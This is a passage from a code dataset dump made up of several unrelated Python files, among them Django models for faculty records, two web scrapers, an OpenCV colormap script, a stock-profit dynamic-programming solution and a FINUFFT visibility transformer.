]\n\n incumbent_files = [[] for _ in range(len(file_re))]\n for filename in sorted(os.listdir(incumbents)):\n for i, reg in enumerate(file_re):\n match = reg.match(filename)\n \n if match:\n budget = int(match.group(1))\n inc_file = os.path.join(incumbents, filename)\n incumbent_files[i].append([budget, inc_file])\n\n return incumbent_files\n\n\ndef get_refit_config(directory):\n _, refit_configs, _, _ = get_incumbents(directory)\n refit_config = max(refit_configs, key=lambda x: x[0]) #get config of max budget\n return refit_config[1]\n","sub_path":"autoPyTorch/utils/loggers.py","file_name":"loggers.py","file_ext":"py","file_size_in_byte":8723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"302699406","text":"\n\n# Your are given an array of integers prices, for which the i-th element is the price of a given stock on day i; and a non-negative integer fee representing a transaction fee.\n# You may complete as many transactions as you like, but you need to pay the transaction fee for each transaction. \n# You may not buy more than 1 share of a stock at a time (ie. you must sell the stock share before you buy again.)\n\n# Return the maximum profit you can make.\n\n# 可多次交易,但每次有交易费,只付一次,买卖的时候都可以?\n\n# DP\n\nclass Solution:\n \"\"\"\n @param prices: a list of integers\n @param fee: a integer\n @return: return a integer\n \"\"\"\n def maxProfit(self, prices, fee):\n # write your code here\n # DP, time O(n), space O(n)\n if not prices:\n return 0\n \n n = len(prices)\n sell = [0] * n # max profit if sell at i-th day\n buy = [0] * n # max profit if buy at i-th day\n sell[0] = 0\n buy[0] = -prices[0]\n for i in range(1, n):\n sell[i] = max(sell[i - 1], buy[i - 1] + prices[i] - fee) # pay when selling\n buy[i] = max(buy[i - 1], sell[i - 1] - prices[i])\n \n return sell[n - 1]\n\n\n\nclass Solution:\n \"\"\"\n @param prices: a list of integers\n @param fee: a integer\n @return: return a integer\n \"\"\"\n def maxProfit(self, prices, fee):\n # write your code here\n # DP, time O(n), space O(1)\n if not prices:\n return 0\n \n n = len(prices)\n sell = 0 # max profit we could have if we did not have a share of stock\n buy = -prices[0] - fee # max profit we could have if we owned a share of stock.\n for i in range(1, n):\n sell = max(sell, buy + prices[i])\n buy = max(buy, sell - prices[i] - fee) # pay when buying\n \n return sell","sub_path":"Best Time to Buy and Sell Stock with Transaction Fee.py","file_name":"Best Time to Buy and Sell Stock with Transaction Fee.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"647337138","text":"import turtle\n\nTx, Ty = -100, 200 #标题坐标\nX, Y = -300,180 #乘法表起始坐标\nL, W = 80, 40 #表格的长和宽\nPx, Py = 10, 7 # 公式相对于表格的偏移量\nPsize = 15 #公式字体大小\nLINEsize = 3 # 线宽\nPcolor = \"red\" #公式颜色\nLcolor = \"blue\" #表格颜色\nturtle.speed(20)\n# turtle.screensize(800,600)\nturtle.penup()\nturtle.goto(Tx,Ty)\nturtle.pendown()\n\nturtle.color(\"green\")\nturtle.write(\"9x9乘法表\", font=(\"楷体\", 45, \"normal\"))\n\n\nturtle.penup()\nturtle.goto(X,Y)\nturtle.pendown()\n\nfor y in range(1,10):\n turtle.penup()\n turtle.goto(X, Y-y*W)\n turtle.pendown()\n for x in range(1,y+1):\n turtle.pensize(LINEsize)\n turtle.penup()\n turtle.goto(X+(x-1)*L, Y-y*W)\n turtle.pendown()\n turtle.color(Lcolor)\n turtle.setheading(0)\n turtle.forward(L)\n turtle.left(90)\n turtle.forward(W)\n turtle.left(90)\n turtle.forward(L)\n turtle.left(90)\n turtle.forward(W)\n\n turtle.penup()\n turtle.goto(X+(x-1)*L+Px, Y - y * W+Py)\n turtle.pendown()\n turtle.color(Pcolor)\n turtle.write(str(x if x y else y)+\"=\"+\n format(x*y,\">2d\"),\n font=(\"楷体\",Psize,\"normal\"))\n\n\nturtle.hideturtle()\nturtle.done()\n","sub_path":"python1702/5作业/5.50.py","file_name":"5.50.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"222514546","text":"import matplotlib.pyplot as plt\nimport yaml\n\nf = plt.figure()\n\n#Read Config\nwith open('vars.yaml', 'r') as fi:\n vars = yaml.load(fi)\n\n#Read data into app\n\nfor line in vars['lines']:\n xLines = [vars['graph']['x'][0]]\n yLines = [vars['graph']['y'][0]]\n\n yholder = vars['graph']['y'][0]\n xholder = 0\n for point in line['data']:\n xLines.append(point[1])\n xLines.append(point[1])\n yLines.append(yholder)\n yLines.append(point[0])\n yholder = point[0]\n xholder = point[1]\n xLines.append(vars['graph']['x'][1])\n yLines.append(yholder)\n plt.plot(xLines, yLines)\n\n\n#Make the graph\nplt.axis([vars['graph']['x'][0], vars['graph']['x'][1], vars['graph']['y'][0], vars['graph']['y'][1]])\nplt.xlabel(vars['graph']['xLabel'])\nplt.ylabel(vars['graph']['yLabel'])\nplt.title(vars['graph']['title'])\n# plt.annotate('No Trip Zone', xy=(vars['graph']['noTripXY'][1], vars['graph']['noTripXY'][0]), xytext=(3, 1.5))\nplt.grid(True)\nplt.show()\n\n#Make the outfile\n#out = input('Name and extension of file: (ex: file.pdf)')\n#f.savefig(out, bbox_inches='tight')","sub_path":"noTripScript.py","file_name":"noTripScript.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"576022113","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom datetime import datetime\nfrom datetime import date\nfrom functools import partial\n\nimport os\nfrom django.template.defaultfilters import slugify\n\nfrom django import forms\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\n\nfrom web.models import Faculty\nfrom web.get_username import current_request\nfrom django.core.validators import RegexValidator\nfrom .utils.widgets import MonthYearWidget\n\nNATION = (\n ('International', 'International'),\n ('National', 'National'),\n)\n\nPAPER_TYPE = (\n ('Conference', 'Conference'),\n ('Journal', 'Journal'),\n)\n\nTYPEBOOK = (\n ('Book', 'Book'),\n ('Book Chapter', 'Book Chapter'),\n)\n\nTYPEFDP = (\n ('FDP', 'FDP'),\n ('Workshop', 'Workshop'),\n ('Seminar', 'Seminar'),\n)\n\nSPONSOR = (\n ('Free', 'Free'),\n ('Self', 'Self'),\n ('Other', 'Other'),\n)\n\nPRESENTED = (\n ('Presented', 'Presented'),\n ('Published', 'Published'),\n ('Presented & Published', 'Presented & Published'),\n)\n\nINDEXING_TYPE = (\n ('SCI/SCIE', 'SCI/SCIE'),\n ('Scopus', 'Scopus'),\n ('UGC Listed', 'UGC Listed'),\n ('Google Scholars', 'Google Scholars'),\n ('Others', 'Others'),\n ('Not Applicable', 'Not Applicable'),\n)\n\ndef wrapper(instance, filename, field, folder):\n extension = filename.split('.')[-1]\n slug = os.path.join(folder, slugify(getattr(instance, field)))\n return '%s.%s' % (slug, extension)\n\ndef image_name(field='title', folder='general'):\n return partial(wrapper, field=field, folder=folder)\n\nclass BookRecord(models.Model):\n top = models.CharField(verbose_name=\"Type\", max_length=15, blank=False, choices=TYPEBOOK, default=TYPEBOOK[0][0])\n title = models.CharField(verbose_name=\"Title/Topic\", max_length=300, blank=False)\n faculty = models.ForeignKey(Faculty, default=1)\n other = models.CharField(verbose_name=\"Other Authors\", max_length=500, null=True, blank=True)\n# count = models.CharField(verbose_name=\"Total Count\", max_length=3, blank=True, null=True)\n type = models.CharField(verbose_name=\"International/National\", max_length=15, blank=False, choices=NATION, default=NATION[0][0])\n publisher = models.CharField(\n verbose_name=\"Publisher\", max_length=200, blank=False, null=True, validators=[RegexValidator('^[a-zA-Z ,-]*$')])\n address = models.CharField(verbose_name=\"Address\", max_length=200, null=True)\n isbn = models.CharField(verbose_name=\"ISBN\", max_length=50, blank=False, null=True, validators=[RegexValidator('^[0-9-xX]*$')])\n issn = models.CharField(verbose_name=\"ISSN\", max_length=50, blank=True, null=True, validators=[RegexValidator('^[0-9-xX]*$')])\n sponsor = models.CharField(verbose_name=\"Sponsoring Authority\", max_length=15, blank=True, null=True, choices=SPONSOR, default=SPONSOR[0][0])\n amount = models.CharField(verbose_name=\"Amount in INR (If Paid)\", max_length=10, blank=False, validators=[RegexValidator('^[0-9-]*$')], null=True)\n specify = models.CharField(verbose_name=\"If other, specify\", max_length=200, null=True, blank=True)\n pages = models.CharField(verbose_name=\"Total Pages\", max_length=10, blank=False, null=True, validators=[RegexValidator('^[0-9]*$')])\n price = models.CharField(verbose_name=\"Price\", max_length=10, null=True)\n# year = models.CharField(max_length=4, blank=False, validators=[RegexValidator('^[0-9]*$')])\n year = models.DateField(verbose_name=\"Date\", blank=False, null=True)\n created_at = models.DateTimeField(auto_now_add=True, auto_now=False)\n updated_at = models.DateTimeField(auto_now_add=False, auto_now=True)\n\n def clean(self):\n super(BookRecord, self).clean()\n req = current_request()\n try:\n logged_user = req.user.userdepartment\n if ((str(self.faculty.department) == logged_user.department) and (str(self.faculty.shift) == logged_user.shift)) or logged_user.department == 'All':\n return self\n else:\n raise ValidationError(\n \"You don't have rights to change other Department's Data\")\n\n except:\n raise ValidationError(\n \"You don't have rights to change other Department's Data\")\n\n class Meta:\n verbose_name = 'Book Record'\n verbose_name_plural = 'Book Records'\n\n def __unicode__(self):\n return \"%s\" % (self.title)\n\n\nclass ResearchRecord(models.Model):\n title = models.CharField(verbose_name=\"Title/Topic\", max_length=300, blank=False)\n faculty = models.ForeignKey(Faculty, default=1)\n type = models.CharField(verbose_name=\"Conference/Journal\",\n max_length=15, blank=False, choices=PAPER_TYPE, default=PAPER_TYPE[0][0])\n presented = models.CharField(verbose_name=\"Presented/Published\", max_length=25, blank=False, choices=PRESENTED, default=PRESENTED[0][0])\n\n nation = models.CharField(verbose_name=\"International/National\", max_length=15, blank=False, choices=NATION, default=NATION[0][0])\n pdf = models.FileField(upload_to=image_name('title', 'research'), blank=True, null=True)\n other = models.CharField(verbose_name=\"Other Authors\", max_length=500, null=True, blank=True)\n student = models.CharField(verbose_name=\"Paper with students (Y/N - For Conference Only)\", max_length=1, null=True, blank=True, validators=[RegexValidator('^[yYnN]*$')],)\n name_of_conference = models.CharField(verbose_name=\"Name of Conference/Journal\", blank=False, max_length=300, null=True, default=\"\")\n address = models.CharField(max_length=200, null=True, blank=True)\n sponsor = models.CharField(verbose_name=\"Sponsoring Authority\", max_length=15, blank=True, null=True, choices=SPONSOR, default=SPONSOR[0][0])\n amount = models.CharField(verbose_name=\"Amount in INR (If Paid)\", max_length=10, blank=False, validators=[RegexValidator('^[0-9-]*$')], null=True)\n specify = models.CharField(verbose_name=\"If other, specify\", max_length=200, null=True, blank=True)\n indexing = models.CharField(max_length=20, choices=INDEXING_TYPE, blank=False, default=INDEXING_TYPE[0][0])\n specify2 = models.CharField(verbose_name=\"If other, specify\", max_length=200, null=True, blank=True)\n h_index = models.CharField(verbose_name=\"H Index\",\n max_length=10, blank=True, null=True)\n publisher = models.CharField(\n verbose_name=\"Publisher\", max_length=200, blank=True, null=True)\n volume = models.CharField(\n verbose_name=\"Volume\", max_length=100, blank=True, null=True, default=\"\")\n issue = models.CharField(\n verbose_name=\"Issue\", max_length=100, blank=True, null=True, default=\"\")\n isbn = models.CharField(\n verbose_name=\"ISBN/ISSN\", max_length=15, blank=True, null=True, validators=[RegexValidator('^[0-9-Xx]*$')])\n pages = models.CharField(verbose_name=\"Page No\",\n max_length=10, blank=True, validators=[RegexValidator('^[0-9-]*$')], null=True)\n\n year = models.DateField(verbose_name=\"Month Year\", blank=True, null=True)\n created_at = models.DateTimeField(auto_now_add=True, auto_now=False)\n updated_at = models.DateTimeField(auto_now_add=False, auto_now=True)\n\n\n\n\n def clean(self):\n super(ResearchRecord, self).clean()\n req = current_request()\n\n type = self.type\n address = self.address\n student = self.student\n presented = self.presented\n publisher = self.publisher\n volume = self.volume\n issue = self.issue\n isbn = self.isbn\n pages = self.pages\n year = self.year\n\n if self.year:\n if (self.year - date.today()).days>0:\n raise ValidationError(\"Date cannot be greater than today's date\")\n\n if type=='Conference':\n if address=='':\n raise ValidationError(\"Address is required for conference\")\n if student=='':\n raise ValidationError(\"Paper with students field is required for conference\")\n\n if presented!='Presented':\n if publisher=='' or volume=='' or issue=='' or isbn=='' or pages=='' or year=='':\n raise ValidationError(\"Records are mandatory if published\")\n\n\n\n try:\n logged_user = req.user.userdepartment\n if ((str(self.faculty.department) == logged_user.department) and (str(self.faculty.shift) == logged_user.shift)) or logged_user.department == 'All':\n return self\n else:\n raise ValidationError(\n \"You don't have rights to change other Department's Data\")\n\n except:\n raise ValidationError(\n \"You don't have rights to change other Department's Data\")\n\n\n\n\n class Meta:\n verbose_name = 'Research Paper & Conference Record'\n verbose_name_plural = 'Research Paper & Conference Records'\n\n def __unicode__(self):\n return \"%s\" % (self.title)\n\n\nclass FDPRecord(models.Model):\n top = models.CharField(verbose_name=\"Type\", max_length=15, blank=False, choices=TYPEFDP, default=TYPEFDP[0][0])\n title = models.CharField(verbose_name=\"Title/Topic\", max_length=300, blank=False)\n faculty = models.ForeignKey(Faculty, default=1)\n venue = models.CharField(verbose_name=\"Venue\", max_length=500, blank=False, null=True)\n address = models.CharField(verbose_name=\"Address\", max_length=500, blank=False, null=True)\n sponsor = models.CharField(verbose_name=\"Sponsoring Authority\", max_length=15, blank=True, null=True, choices=SPONSOR, default=SPONSOR[0][0])\n amount = models.CharField(verbose_name=\"Amount in INR (If Paid)\", max_length=10, blank=False, validators=[RegexValidator('^[0-9-]*$')], null=True)\n specify = models.CharField(verbose_name=\"If other, specify\", max_length=200, null=True, blank=True)\n date = models.DateField(verbose_name=\"Date (from)\", null=True, blank=False)\n date2 = models.DateField(verbose_name=\"Date (to)\", null=True, blank=False)\n\n duration = models.CharField(default=\"\", max_length=10)\n created_at = models.DateTimeField(auto_now_add=True, auto_now=False)\n updated_at = models.DateTimeField(auto_now_add=False, auto_now=True)\n\n def clean(self):\n super(FDPRecord, self).clean()\n req = current_request()\n\n if self.date and self.date2:\n self.duration = str(abs((self.date2 - self.date).days)) + ' days'\n\n if (self.date2 - date.today()).days>0:\n raise ValidationError(\"Date (to) cannot be greater than today's date\")\n\n if (self.date - self.date2).days>0:\n raise ValidationError(\"Date (from) cannot be greater than Date (to)\")\n\n try:\n logged_user = req.user.userdepartment\n if ((str(self.faculty.department) == logged_user.department) and (str(self.faculty.shift) == logged_user.shift)) or logged_user.department == 'All':\n return self\n else:\n raise ValidationError(\n \"You don't have rights to change other Department's Data\")\n\n except:\n raise ValidationError(\n \"You don't have rights to change other Department's Data\")\n\n class Meta:\n verbose_name = 'FDP/Workshop Record'\n verbose_name_plural = 'FDP/Workshop Records'\n\n def __unicode__(self):\n return \"%s\" % (self.title)\n","sub_path":"storage/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"607741814","text":"class Budget:\n\n def __init__(self,category, amount):\n self.category = category\n self.amount = amount\n \n #methods\n def deposit(self):\n deposit = float(input('Enter deposit amount: '))\n self.amount += deposit\n return f'Depost Successfull'\n \n\n def withdrawal(self):\n withdraw = float(input('Enter amount to withdraw:'))\n if self.amount >= withdraw:\n self.amount -= withdraw\n return f'Withdraw is successfull'\n else:\n print('Insufficient balance')\n return f'Choose a different amount'\n\n\n def transfer(self):\n transfer = float(input('Enter amount to transfer '))\n if self.amount >= transfer:\n self.amount -= transfer\n return f'Your transfer is successfull'\n else:\n print('Insufficient balance ')\n return f'Choose a different amount'\n\n \n def check_balance(self):\n return f'\\n Your curent balance is {self.amount}'\n \n\n# creating objects of class\ncategory = Budget('Food', 2000)\ncategory_1 = Budget('clothing', 5000)\ncategory_2 = Budget('Entertainment', 7000) \n\n# Calling methods with class objects\nprint('****** Food Category ******')\nprint(category.deposit())\nprint(category.withdrawal())\nprint(category.transfer())\nprint(category.check_balance())\n\n\nprint('****** Clothing Category ******')\nprint(category_1.deposit())\nprint(category_1.withdrawal())\nprint(category_1.transfer())\nprint(category_1.check_balance())\n\n\nprint('****** Entertainment Category ******')\nprint(category_2.deposit())\nprint(category_2.withdrawal())\nprint(category_2.transfer())\nprint(category_2.check_balance())","sub_path":"budget.py","file_name":"budget.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"303076537","text":"\nclass Utilities:\n\n @staticmethod\n def get_unique_items(container: tuple) -> tuple:\n if type(container) != tuple:\n raise TypeError(\"get_unique_items(container: tuple)\"\n \" - container must be of tuple type\")\n if len(container) == 1:\n return tuple(container)\n ans = []\n for item in container:\n if item not in ans:\n ans.append(item)\n return tuple(ans)\n\n @staticmethod\n def request(ostream, istream, message: str) -> str:\n numChars = ostream.write(message)\n ostream.flush()\n input = istream.readline().rstrip()\n istream.flush()\n return input","sub_path":"stricher/week_10/mailroom/Utilities.py","file_name":"Utilities.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"175337860","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\nfrom douban.items import DoubanItem\n\n\nclass DoubanTop250Spider(scrapy.Spider):\n name = 'douban_top250'\n allowed_domains = ['douban.com']\n start_urls = ['https://movie.douban.com/top250']\n\n def parse(self, response):\n #可以先将源码拿到,查看需要的数据是否拿到\n\n # with open(\"test.html\",\"w\",encoding='utf8') as f:\n # f.write(response.text)\n\n\n #拿去该页的数据和下一页的url\n # 将该页数据组装到meta中传递给详情页,在详情页拼接所有数据保存\n\n data_list = response.xpath('//*[@id=\"content\"]/div/div/ol/li/div')\n\n for item in data_list:\n dic = {}\n detail_url = item.xpath('./div/a/@href').extract_first()\n image_url = item.xpath('./div/a/img/@src').extract_first()\n name = item.xpath('./div[2]/div[1]/a/span[1]/text()').extract_first()\n score = item.xpath('./div[2]/div[2]/div/span[2]/text()').extract_first()\n ranking = item.xpath('./div[1]/em/text()').extract_first()\n\n dic['name'] = name\n dic['image_url'] = image_url\n dic['score'] = score\n dic['url'] = detail_url\n dic['ranking'] = ranking\n yield scrapy.Request(detail_url,callback=self.detail_parse,meta=dic)\n\n\n url = response.xpath('//*[@id=\"content\"]/div/div[1]/div[2]/span[3]/a/@href').extract_first()\n next_url = response.urljoin(url)\n yield scrapy.Request(next_url,callback=self.parse)\n\n\n def detail_parse(self,response):\n # with open('detail.html',\"w\",encoding='utf8')as f:\n # f.write(response.text)\n detail = response.xpath('//*[@id=\"link-report\"]/span/text()').extract_first().strip()\n\n data_dic = response.meta\n\n item = DoubanItem()\n item['name'] = data_dic.get('name')\n item['url'] = data_dic.get('url')\n item['image_url'] = data_dic.get('image_url')\n item['score'] = data_dic.get('score')\n item['desc'] = detail\n item['ranking'] = data_dic.get('ranking')\n\n\n #可以在这里调用pipeline进行保存\n yield item","sub_path":"douban/spiders/douban_top250.py","file_name":"douban_top250.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"584467731","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 30 21:34:54 2020\n\n@author: lizeth\n\"\"\"\n\nimport cv2\nimport numpy as np\n\n\ndef hconcat_resize_min(im_list, interpolation=cv2.INTER_CUBIC):\n h_min = min(im.shape[0] for im in im_list)\n im_list_resize = [cv2.resize(im, (int(im.shape[1] * h_min / im.shape[0]), h_min), interpolation=interpolation)\n for im in im_list]\n return cv2.hconcat(im_list_resize)\n\nimg = cv2.imread('t3.jpg',0)\nfil,col = img.shape\nRGB = np.zeros((fil,col,3),dtype = 'uint8')\n\ndvi = 100\nmapc = np.zeros((500, 100, 3), dtype = \"uint8\")\nR1 = np.zeros((500, 100, 1), dtype = \"uint8\")\nG1 = np.zeros((500, 100, 1), dtype = \"uint8\")\nB1 = np.zeros((500, 100, 1), dtype = \"uint8\")\nfor i in range(100):\n for j in range(100):\n R1[i,j] = 0\n G1[i,j] = ((0)*(i/dvi))\n B1[i,j] = ((0)*(i/dvi)) + 128\n\n R1[i+dvi,j] = 0\n G1[i+dvi,j] = ((255)*(i/dvi))\n B1[i+dvi,j] = ((-128)*(i/dvi)) + 128\n\n R1[i+(dvi*2),j] = 255*(i/dvi)\n G1[i+(dvi*2),j] = ((0)*(i/dvi)) +255\n B1[i+(dvi*2),j] = ((0)*(i/dvi))\n\n R1[i+(dvi*3),j] = ((0)*(i/dvi)) + 255\n G1[i+(dvi*3),j] = ((128-255)*(i/dvi)) +255\n B1[i+(dvi*3),j] = ((0)*(i/dvi))\n\n R1[i+(dvi*4),j] = ((0)*(i/dvi)) +255\n G1[i+(dvi*4),j] = ((-128)*(i/dvi)) +128\n B1[i+(dvi*4),j] = 0\n\nmap = cv2.merge((B1,G1,R1))\n#cv2.imshow('mapa',mapc)\n\n\n\ndef inte(intensity):\n if intensity<0:\n R = 0\n G = 0\n B = 128\n elif (intensity > 0) and (intensity<=0.25):\n fraction = intensity\n R = (0) * fraction\n G = (255) * fraction\n B = (-128) * fraction + 128\n\n elif(intensity>0.25) and (intensity<= 0.5):\n fraction = intensity\n R = (255) * fraction\n G = (255-255) * fraction +255\n B = (0) * fraction\n elif(intensity>0.5) and (intensity<= 0.75):\n fraction = intensity/(0.75-0.5)\n R = (255-255) * fraction + 255\n G = (128-255) * fraction + 255\n B = (0) * fraction\n\n elif (intensity>0.75) and (intensity<=1) :\n fraction = intensity\n R = (255-255) * fraction + 255\n G = (-128) * fraction + 128\n B = (- 0) * fraction\n\n else:\n R = 255\n G = 0\n B = 0\n return R,G,B\n\nintensity = 0.0\nfor i in range(fil):\n for j in range(col):\n intensity = img[i][j]/255.0\n r,g,b = inte(intensity)\n RGB[i][j][2] = r\n RGB[i][j][1] = g\n RGB[i][j][0] = b\n\n\nimage = cv2.merge((RGB[:,:,0],RGB[:,:,1],RGB[:,:,2]))\nr = image[:,:,2]\ncv2.imshow('r',r)\ncv2.imwrite('pol.jpg',r)\n\nimg_gray = cv2.merge((img,img,img))\nimgFinal = np.concatenate((img_gray, image), axis=1)\n#cv2.imshow('INTERPOLATION',imgFinal)\n#cv2.imshow('Map',map)\n\nim_h_resize = hconcat_resize_min([img_gray,map, image])\ncv2.imshow('Interpolation',im_h_resize)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"Lab3/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"551971492","text":"\"\"\"This module contains realization of pikabu pasres.\n\nPikabu parser gets specified number of posts and counts all tags.\n\nInfo: to get cookie you need to go and log in at https://pikabu.ru,\nthen open a Request Headers (Request URL: https://pikabu.ru/) and copy cookie to file user_cookie as\ncookie = ...(ur cookie)\n\n Typical usage example:\n\n number_of_posts = 100\n session = requests.Session()\n posts_tags = pikabu_parser(session, number_of_posts)\n\"\"\"\n\nfrom bs4 import BeautifulSoup as bs\nfrom collections import Counter\nimport requests\nimport user_cookie\n\n\nHEADERS = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3',\n 'Connection': 'keep-alive',\n 'Cookie': user_cookie.cookie,\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 OPR/65.0.3467.78 (Edition Yx)',\n 'Upgrade-Insecure-Requests': '1'}\n\n\ndef pikabu_parser(session: requests.Session, num_posts: int) -> Counter:\n \"\"\"Parser tags in pikabu subscriptions on specified number of posts\n\n Args:\n session: Current session\n num_posts: Number of posts where we count tags\n\n Returns:\n Counter structure where key is name of tags and value it's number of appearances\n on specified number of posts\n \"\"\"\n count = Counter()\n current_post = 0\n url = 'https://pikabu.ru/new/subs'\n max_pages_number = num_posts // 10 if not num_posts % 10 else num_posts // 10 + 1\n for page in range(max_pages_number + 1):\n paramload = {'page': str(page)}\n resp = session.get(url, headers=HEADERS, params=paramload)\n soup = bs(resp.content, 'html.parser')\n divs = soup.find_all('div', attrs={'class': 'story__tags tags'})\n for div in divs:\n current_post += 1\n for a in div:\n try:\n count[a['data-tag']] += 1\n except (TypeError, KeyError):\n pass\n if current_post == num_posts:\n return count\n\n\nif __name__ == '__main__':\n number_of_posts = 100\n session = requests.Session()\n posts_tags = pikabu_parser(session, number_of_posts)\n with open('output/tag_statistics.dat', 'w') as stat_file:\n for key, value in posts_tags.most_common(10):\n stat_file.write(f\"{key}: {value}\\n\")\n","sub_path":"10-HTTP/pikabu_parser.py","file_name":"pikabu_parser.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"72957264","text":"import numpy as np\nfrom astropy import units\n\nimport finufftpy\n\n# NOTE: This is added because I have two version of OpenMP on my laptop\nos.environ['KMP_DUPLICATE_LIB_OK'] = 'True'\n\n\n# ...\nautolens_version = \"0.40.0\"\n\n# ...\nif os.environ[\"HOME\"] == \"/Users/ccbh87\":\n COSMA_HOME = os.environ[\"COSMA_HOME_local\"]\n COSMA_DATA = os.environ[\"COSMA7_DATA_local\"]\nelif os.environ[\"HOME\"] == \"/cosma/home/durham/dc-amvr1\":\n COSMA_HOME = os.environ[\"COSMA_HOME_host\"]\n COSMA_DATA = os.environ[\"COSMA7_DATA_host\"]\n\n# ...\nworkspace_HOME_path = COSMA_HOME + \"/workspace\"\nworkspace_DATA_path = COSMA_DATA + \"/workspace\"\n\n# ...\nimport autofit as af\naf.conf.instance = af.conf.Config(\n config_path=workspace_DATA_path + \"/config\" + \"_\" + autolens_version,\n output_path=workspace_DATA_path + \"/output\")\nimport autolens as al\n\n\nclass FINUFFT_Transformer:\n def __init__(self, uv_wavelengths, grid, eps=10**-6.0):\n\n self.uv_wavelengths = uv_wavelengths\n\n self.grid = grid\n\n self.shift = np.exp(\n 2.0\n * np.pi\n * 1j\n * (\n self.grid.pixel_scale/2.0 * units.arcsec.to(units.rad) * self.uv_wavelengths[:, 1]\n + self.grid.pixel_scale/2.0 * units.arcsec.to(units.rad) * self.uv_wavelengths[:, 0]\n )\n )\n\n # NOTE: normalize the uv_wavelengths according to the max wavenumber given the pixel scale of the image\n self.uv_wavelengths_normalized = self.uv_wavelengths / (1.0 / (2.0 * self.grid.pixel_scale * units.arcsec.to(units.rad)))\n\n self.eps = eps\n\n\n def visibilities_from_image(self, image_in_2d):\n\n visibilities = np.zeros(\n shape=self.uv_wavelengths.shape[0],\n dtype=np.complex\n )\n ret = finufftpy.nufft2d2(\n self.uv_wavelengths_normalized[:, 1] * np.pi,\n self.uv_wavelengths_normalized[:, 0] * np.pi,\n visibilities,\n 1,\n self.eps,\n image_in_2d[:, ::-1]\n )\n visibilities *= self.shift\n\n return visibilities\n\n # def transformed_mapping_matrices_from_mapping_matrix_slow(self, mapping_matrix):\n #\n # # NOTE: This gives correct results but it's very slow ...\n # real_transfomed_mapping_matrix = np.zeros(\n # (self.uv_wavelengths.shape[0], mapping_matrix.shape[1])\n # )\n # imag_transfomed_mapping_matrix = np.zeros(\n # (self.uv_wavelengths.shape[0], mapping_matrix.shape[1])\n # )\n #\n # for source_pixel_1d_index in range(mapping_matrix.shape[1]):\n # image = mapping_matrix[:, source_pixel_1d_index].reshape(\n # self.grid.shape_2d[0],\n # self.grid.shape_2d[1]\n # )\n #\n # visibilities = self.visibilities_from_image(\n # image_in_2d=image\n # )\n #\n # real_transfomed_mapping_matrix[:, source_pixel_1d_index] = visibilities.real\n # imag_transfomed_mapping_matrix[:, source_pixel_1d_index] = visibilities.imag\n #\n # return [real_transfomed_mapping_matrix, imag_transfomed_mapping_matrix]\n\n\n @staticmethod\n def reshape_mapping_matrix(mapping_matrix, shape_2d):\n\n mapping_matrix_reshaped = np.zeros(\n shape=(\n shape_2d + (mapping_matrix.shape[1],)\n )\n )\n\n for i in range(mapping_matrix.shape[1]):\n image = np.reshape(\n a=mapping_matrix[:, i], newshape=shape_2d\n )\n mapping_matrix_reshaped[:, :, i] = image[:, ::-1]\n\n return mapping_matrix_reshaped\n\n\n def transformed_mapping_matrices_from_mapping_matrix(self, mapping_matrix):\n\n mapping_matrix_reshaped = self.reshape_mapping_matrix(\n mapping_matrix=mapping_matrix,\n shape_2d=self.grid.shape_2d\n )\n\n visibilities = np.zeros(\n shape=(self.uv_wavelengths.shape[0], mapping_matrix.shape[1]),\n order='F',\n dtype=np.complex\n )\n finufftpy.nufft2d2many(\n self.uv_wavelengths_normalized[:, 1] * np.pi,\n self.uv_wavelengths_normalized[:, 0] * np.pi,\n visibilities,\n 1,\n self.eps,\n mapping_matrix_reshaped\n )\n\n for i in range(visibilities.shape[1]):\n visibilities[:, i] *= self.shift\n\n return [visibilities.real, visibilities.imag]\n","sub_path":"autoarray/operators/FINUFFT_transformer.py","file_name":"FINUFFT_transformer.py","file_ext":"py","file_size_in_byte":4435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"250353070","text":"import logging\nlog = logging.getLogger(__name__)\nimport decimal\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine\nfrom pyramid.renderers import JSON\nfrom pyramid.config import Configurator\n\n\nclass Base(object):\n def __json__(self, request):\n json_exclude = getattr(self, '__json_exclude__', set())\n result_dict = {}\n for key, value in self.__dict__.items():\n if not key.startswith('_') and key not in json_exclude:\n if isinstance(value, decimal.Decimal):\n result_dict[key] = float(value)\n else:\n result_dict[key] 